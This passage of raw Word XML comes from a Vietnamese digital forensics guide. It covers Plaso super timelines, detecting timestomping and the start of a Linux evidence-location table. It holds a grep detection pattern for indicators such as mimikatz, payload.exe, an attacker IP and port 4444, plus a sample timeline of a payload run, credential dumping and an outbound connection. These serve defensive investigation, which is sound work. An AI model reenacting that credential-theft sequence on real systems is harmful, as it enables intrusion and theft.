        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="tạo-super-timeline-bằng-plaso"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>11.1. Tạo Super Timeline bằng Plaso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64BD33">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>log2timeline.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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--parsers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'win7_slow,sqlite,winreg,winevtx,prefetch,lnk,firefox_history,chrome_history'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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/home/the_cyber_bite/cases/CASE001/case001.plaso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/home/the_cyber_bite/cases/CASE001/evidence.E01</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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>psort.py</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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> dynamic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-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/super_timeline.csv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--slice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'2026-01-14T22:30:00'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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--slice_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 60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/home/the_cyber_bite/cases/CASE001/case001.plaso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6A360B">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Lọc sự kiện liên quan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD392F8">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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>grep</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-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'mimikatz\|payload.exe\|185.220.101.47\|cmd.exe\|4444'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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super_timeline.csv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sort</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-k1,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F17940">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Ví dụ trình tự:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3764852B">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>22:37:58  Chrome History: truy cập /payload.exe</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22:38:00  NTFS MFT: tạo Downloads\payload.exe</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22:38:14  Prefetch: payload.exe chạy lần đầu</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22:40:55  Event 4688: explorer.exe tạo cmd.exe</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22:41:02  Event 4688: cmd.exe tạo mimikatz.exe</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22:41:15  NTFS MFT: tạo C:\Windows\Temp\loot.txt</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22:44:18  Network: kết nối 45.133.240.89:443</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:p w14:paraId="166A4306">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="phát-hiện-timestomping"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>11.2. Phát hiện timestomping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2158A1D2">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Kỹ thuật timestomping sửa dấu thời gian để che giấu thứ tự hoạt động. Dấu hiệu gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F75D10C">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$STANDARD_INFORMATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> khác đáng kể với </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$FILE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B20A7C6">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Tất cả giá trị MACB giống nhau chính xác đến từng giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C229EEB">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Tệp có timestamp trước ngày cài hệ điều hành hoặc ngoài khoảng hoạt động hợp lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E2895">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Event Log, Prefetch hoặc browser history mâu thuẫn với timestamp tệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44783797">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Cảnh báo chống pháp chứng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$FILE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> thường do hệ điều hành cập nhật và khó bị công cụ user-mode sửa đồng bộ. Bất nhất giữa hai bộ timestamp phải được ghi rõ trong báo cáo, nhưng không nên tự động coi đó là bằng chứng duy nhất của hành vi ác ý.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkEnd w:id="60"/>
    <w:p w14:paraId="3C6319A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="pháp-chứng-linux"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>12. Pháp chứng Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0567B163">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ext4, auditd, bash history, cron và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/proc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> - dấu vết trên Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16105D04">
      <w:pPr>
        <w:pStyle w:val="3"/>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Linux là hệ điều hành máy chủ chủ đạo, thường xuất hiện trong cloud, web server, container và IoT. Dấu vết rất phong phú nhưng được tổ chức khác Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F187C26">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="vị-trí-chứng-cứ-quan-trọng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>12.1. Vị trí chứng cứ quan trọng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3689"/>
        <w:gridCol w:w="6357"/>
      </w:tblGrid>
      <w:tr w14:paraId="0ED8FBC9">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6F7C9AA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Vị trí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74AD7B3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Nội dung</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2248384D">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4C53650">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/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51CBA96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Tài khoản, UID, GID, home và shell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3EF41FC7">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3DB19D86">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/etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22E8727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Password hash, chỉ root đọc; phát hiện tài khoản bị sửa hoặc tạo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1441FAB2">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7BBB53B5">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/etc/cron.d/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>, crontab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61C4DD7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Scheduled task persistence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2AEB5AC2">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33991814">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/etc/rc.local</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/etc/init.d/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B78EFA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Persistence khi khởi động kiểu cũ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="360E243B">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7BAA2BE0">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~/.bash_history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69C93A4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Lệnh người dùng; thường là thứ đầu tiên kẻ tấn công xóa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4B77F38A">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5395A222">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~/.ssh/authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47642CD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Public key SSH; vị trí backdoor không cần mật khẩu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3EA39B4B">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77FDAE6">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/var/log/auth.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/var/log/secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D50127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 xml:space="preserve">SSH, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>, xác thực và thay đổi tài khoản.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="314B43EE">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19009B66">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/var/log/syslog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/var/log/messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5886EC1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Sự kiện hệ thống tổng quát.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="17E8BCBB">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586508D">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/var/log/apache2/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>, nginx/httpd logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5511BF8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HTTP request và payload tấn công trong URL/body.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3D36033D">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0976177B">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/proc/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41BA1D8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Dữ liệu kernel trực tiếp: tiến trình, kết nối và memory map.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1C1C5E88">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47EB429">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/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/var/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/dev/shm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
